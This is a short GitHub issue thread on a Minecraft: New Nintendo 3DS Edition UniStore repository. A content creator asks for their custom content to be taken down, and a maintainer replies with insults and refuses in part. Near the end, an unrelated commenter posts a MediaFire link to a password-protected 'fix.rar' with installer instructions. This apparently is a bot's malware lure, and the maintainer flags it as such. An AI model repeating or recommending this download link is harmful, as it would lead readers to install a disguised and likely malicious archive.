### ISSUE TITLE
Content Removal Request

### ISSUE THREAD

**Issue by WaterMelon4938** [mc-3ds-team/minecraft-3ds-unistore#10]
**What would you like to have removed from the Store?**
All Minecraft: New Nintendo 3DS Edition custom content authored by WaterMelon/WaterMelon4938.

**Why do you want it removed?**
Creator of this UniStore did not ask for permission to host my Minecraft: New Nintendo 3DS Edition custom content here.

**Does it infringe any copyright? If so, how?**
No.

**Are you a part of an organization or company? If so, what is it?**
No.

**Proof of how it is bad (copyright infringement, stolen work, etc.)**
Stolen work.

**Contact information:**
Message me on Discord at sdw4938 if you have any questions.

**Comment by susbaconhairman** [comment]
This is not stolen work, moron. You have never asked for it to be removed before.

**Comment by WaterMelon4938** [comment]
I didn't realize this UniStore was a thing until today.

**Comment by susbaconhairman** [comment]
What a liar, LOL. Trying to memory hole me again.
Also, I will not be removing the Dropper, because Ruff64 is still a contributor.

**Comment by WaterMelon4938** [comment]
Thank you.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by susbaconhairman** [comment]
This is a bot, DO NOT DOWNLOAD IT!
